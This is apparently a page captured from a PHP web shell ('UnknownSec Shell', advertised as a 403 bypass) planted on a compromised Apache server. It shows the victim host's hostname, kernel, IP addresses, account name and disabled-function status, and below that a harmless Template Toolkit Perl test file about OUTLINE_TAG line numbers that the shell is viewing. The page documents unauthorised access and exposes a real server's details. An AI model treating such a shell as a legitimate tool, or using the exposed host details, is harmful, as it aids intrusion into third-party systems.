shell bypass 403

UnknownSec Shell

Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 104.21.5.151
Your Ip: 216.73.217.141
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : outline_line.t
#============================================================= -*-perl-*-
#
# t/outline_line.t
#
# Test the OUTLINE_TAG option reporting incorrect line numbers.
# https://github.com/abw/Template2/issues/295
#
# Written by Andy Wardley <[email protected]>
#
# Copyright (C) 2022 Andy Wardley.  All Rights Reserved.
#
# This is free software; you can redistribute it and/or modify it
# under the same terms as Perl itself.
#
#========================================================================

use strict;
use warnings;
use lib qw( ./lib ../lib );
use Template::Test;
use Template::Parser;

$/=undef;
my $text = <DATA>;

my $parser   = Template::Parser->new({ OUTLINE_TAG => '%%' });
my $parsed   = $parser->parse($text, { name => 'test' });
my $template = $parsed->{ BLOCK };
my @lines;

while ($template =~ /#line (\d) "test"/g) {
    push(@lines, $1);
}
is( join(', ', @lines), "1, 2, 3, 4", "lines 1, 2, 3, 4" );

__DATA__
%% line1
%% line2
[% line3 %]
[% line4 %]
© 2026 UnknownSec